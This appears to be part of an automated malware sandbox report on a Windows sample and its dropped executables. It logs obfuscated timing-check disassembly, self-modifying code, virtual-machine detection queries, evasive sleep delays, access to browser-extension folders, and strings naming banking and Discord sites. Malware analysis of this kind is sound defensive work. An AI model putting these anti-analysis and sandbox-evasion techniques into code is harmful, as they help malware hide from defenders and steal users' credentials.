Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310A22 second address: 5310A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310A26 second address: 5310A6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F1BE47673CEh 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F1BE47673D7h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310A6B second address: 5310A71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310A71 second address: 5310A97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1BE47673D0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310A97 second address: 5310A9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310A9B second address: 5310AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53905FA second address: 5390628 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC079h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1BE4ECC06Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 538077F second address: 5380783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380783 second address: 5380789 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380789 second address: 53807A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BE47673D9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53807A6 second address: 5380847 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F1BE4ECC06Ah 0x00000010 xor esi, 10AD12E8h 0x00000016 jmp 00007F1BE4ECC06Bh 0x0000001b popfd 0x0000001c mov di, si 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 jmp 00007F1BE4ECC072h 0x00000026 mov ebp, esp 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F1BE4ECC06Eh 0x0000002f or ax, 7078h 0x00000034 jmp 00007F1BE4ECC06Bh 0x00000039 popfd 0x0000003a pushfd 0x0000003b jmp 00007F1BE4ECC078h 0x00000040 add si, 8AD8h 0x00000045 jmp 00007F1BE4ECC06Bh 0x0000004a popfd 0x0000004b popad 0x0000004c pop ebp 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F1BE4ECC070h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380847 second address: 538084D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320165 second address: 5320169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320169 second address: 532016D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 532016D second address: 5320173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380D30 second address: 5380D34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380D34 second address: 5380D3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380D3A second address: 5380D40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380D40 second address: 5380D44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 533060E second address: 533068D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F1BE47673D3h 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ecx, 7630FCABh 0x00000012 call 00007F1BE47673D0h 0x00000017 mov ecx, 4BD36A11h 0x0000001c pop ecx 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 jmp 00007F1BE47673CDh 0x00000025 push FFFFFFFEh 0x00000027 jmp 00007F1BE47673CEh 0x0000002c push 08738E63h 0x00000031 jmp 00007F1BE47673D1h 0x00000036 xor dword ptr [esp], 7E8B4E7Bh 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 mov edx, 66803D5Eh 0x00000045 mov ax, dx 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 533068D second address: 53306CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1BE4ECC06Eh 0x00000008 jmp 00007F1BE4ECC072h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push 1A1EC03Bh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F1BE4ECC073h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53306CF second address: 53306EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53306EC second address: 53306F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53306F2 second address: 5330772 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 6CF16E3Bh 0x00000012 jmp 00007F1BE47673D6h 0x00000017 mov eax, dword ptr fs:[00000000h] 0x0000001d pushad 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F1BE47673CCh 0x00000025 sbb eax, 3AF5BFA8h 0x0000002b jmp 00007F1BE47673CBh 0x00000030 popfd 0x00000031 mov di, cx 0x00000034 popad 0x00000035 jmp 00007F1BE47673D4h 0x0000003a popad 0x0000003b nop 0x0000003c pushad 0x0000003d mov ax, C2DDh 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 pop edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330772 second address: 5330789 instructions: 0x00000000 rdtsc 0x00000002 mov di, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1BE4ECC06Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330789 second address: 5330873 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F1BE47673D6h 0x0000000f sub esp, 1Ch 0x00000012 jmp 00007F1BE47673D0h 0x00000017 xchg eax, ebx 0x00000018 jmp 00007F1BE47673D0h 0x0000001d push eax 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F1BE47673D1h 0x00000025 or eax, 52B6B696h 0x0000002b jmp 00007F1BE47673D1h 0x00000030 popfd 0x00000031 popad 0x00000032 xchg eax, ebx 0x00000033 pushad 0x00000034 call 00007F1BE47673D3h 0x00000039 pushfd 0x0000003a jmp 00007F1BE47673D8h 0x0000003f xor eax, 17857118h 0x00000045 jmp 00007F1BE47673CBh 0x0000004a popfd 0x0000004b pop esi 0x0000004c push eax 0x0000004d push edx 0x0000004e pushfd 0x0000004f jmp 00007F1BE47673CFh 0x00000054 or eax, 043ADDDEh 0x0000005a jmp 00007F1BE47673D9h 0x0000005f popfd 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330873 second address: 53308DB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F1BE4ECC070h 0x00000008 xor ax, F5D8h 0x0000000d jmp 00007F1BE4ECC06Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, esi 0x00000017 jmp 00007F1BE4ECC076h 0x0000001c push eax 0x0000001d jmp 00007F1BE4ECC06Bh 0x00000022 xchg eax, esi 0x00000023 jmp 00007F1BE4ECC076h 0x00000028 xchg eax, edi 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53308DB second address: 53308DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53308DF second address: 53308E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53308E5 second address: 533098F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1BE47673D2h 0x00000009 add ch, FFFFFFF8h 0x0000000c jmp 00007F1BE47673CBh 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 pushad 0x00000017 mov dl, al 0x00000019 mov bl, 77h 0x0000001b popad 0x0000001c xchg eax, edi 0x0000001d jmp 00007F1BE47673D6h 0x00000022 mov eax, dword ptr [76FAB370h] 0x00000027 jmp 00007F1BE47673D0h 0x0000002c xor dword ptr [ebp-08h], eax 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007F1BE47673CEh 0x00000036 add cx, 90E8h 0x0000003b jmp 00007F1BE47673CBh 0x00000040 popfd 0x00000041 push eax 0x00000042 push edx 0x00000043 pushfd 0x00000044 jmp 00007F1BE47673D6h 0x00000049 sbb eax, 43A0A348h 0x0000004f jmp 00007F1BE47673CBh 0x00000054 popfd 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 533098F second address: 53309B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC078h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xor eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53309B4 second address: 53309B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53309B8 second address: 53309BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53309BE second address: 53309C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53309C4 second address: 53309C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53309C8 second address: 5330A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F1BE47673D6h 0x00000010 sbb cl, 00000038h 0x00000013 jmp 00007F1BE47673CBh 0x00000018 popfd 0x00000019 call 00007F1BE47673D8h 0x0000001e pushad 0x0000001f popad 0x00000020 pop ecx 0x00000021 popad 0x00000022 mov dword ptr [esp], eax 0x00000025 jmp 00007F1BE47673D7h 0x0000002a lea eax, dword ptr [ebp-10h] 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007F1BE47673CBh 0x00000036 sbb eax, 0E673B0Eh 0x0000003c jmp 00007F1BE47673D9h 0x00000041 popfd 0x00000042 pushfd 0x00000043 jmp 00007F1BE47673D0h 0x00000048 xor ax, 8188h 0x0000004d jmp 00007F1BE47673CBh 0x00000052 popfd 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330A83 second address: 5330AAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC079h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr fs:[00000000h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: AFEE6C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: AFEF72 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: CD7679 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D40F9D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 25EE6C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 25EF72 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 437679 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 4A0F9D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Special instruction interceptor: First address: 8257B0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Special instruction interceptor: First address: 9CEE36 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Special instruction interceptor: First address: 9CF1F8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Special instruction interceptor: First address: 9CDB93 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Special instruction interceptor: First address: 9F3F4E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Special instruction interceptor: First address: A5BB78 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Special instruction interceptor: First address: 596C80 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Special instruction interceptor: First address: 5756E9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Special instruction interceptor: First address: 5F18B0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Special instruction interceptor: First address: 49F9C1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Special instruction interceptor: First address: 63DD2A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Special instruction interceptor: First address: 6C98E1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Special instruction interceptor: First address: ABDD2E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Special instruction interceptor: First address: ABDDE6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Special instruction interceptor: First address: C6CBC2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Special instruction interceptor: First address: CF6AF4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Memory allocated: 4AA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Memory allocated: 4C70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Memory allocated: 4AC0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05380C07 rdtsc 0_2_05380C07
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Evaded block: after key decision
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe API coverage: 9.4 %
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe API coverage: 1.6 %
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1680 Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1680 Thread sleep time: -62031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2716 Thread sleep time: -56028s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6728 Thread sleep count: 235 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6728 Thread sleep time: -7050000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6532 Thread sleep time: -58029s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1012 Thread sleep time: -46023s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5660 Thread sleep time: -56028s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6764 Thread sleep time: -60030s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6000 Thread sleep time: -50025s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2704 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6728 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe TID: 1016 Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe TID: 6208 Thread sleep time: -40020s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe TID: 4676 Thread sleep count: 39 > 30
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe TID: 4676 Thread sleep count: 85 > 30
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe TID: 4676 Thread sleep count: 78 > 30
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe TID: 4676 Thread sleep count: 79 > 30
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe TID: 4676 Thread sleep count: 62 > 30
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe TID: 4676 Thread sleep count: 89 > 30
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe TID: 4676 Thread sleep count: 105 > 30
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe TID: 4676 Thread sleep count: 98 > 30
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe TID: 4676 Thread sleep count: 192 > 30
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe TID: 4676 Thread sleep count: 176 > 30
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe TID: 5176 Thread sleep time: -38019s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe TID: 6436 Thread sleep time: -36018s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe TID: 6108 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe TID: 6388 Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe TID: 3496 Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe TID: 3580 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe TID: 2740 Thread sleep count: 55 > 30
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe TID: 2740 Thread sleep time: -330000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_004176E7 FindFirstFileExW, 7_2_004176E7
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_10007EA9 FindFirstFileExW, 7_2_10007EA9
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B8794E FindFirstFileExW, 7_2_04B8794E
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E354D1 sqlite3_os_init,GetSystemInfo, 9_2_61E354D1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: file.exe, 00000000.00000002.2056484384.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2088343530.00000000003EF000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000002.00000002.2090254348.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.2089649598.00000000003EF000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000006.00000002.3259289947.00000000003EF000.00000040.00000001.01000000.00000008.sdmp, 4611cc433b.exe, 4611cc433b.exe, 00000007.00000002.3256554166.00000000009AE000.00000040.00000001.01000000.0000000A.sdmp, 79ddad050f.exe, 79ddad050f.exe, 00000008.00000002.3256159559.000000000054C000.00000040.00000001.01000000.0000000B.sdmp, e051bdf457.exe, e051bdf457.exe, 00000009.00000002.3257897412.0000000000621000.00000040.00000001.01000000.0000000C.sdmp, 79ddad050f.exe, 0000000A.00000002.3255716467.000000000054C000.00000040.00000001.01000000.0000000B.sdmp, e051bdf457.exe, 0000001D.00000002.3256089831.0000000000621000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.0000000005974000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696428655p
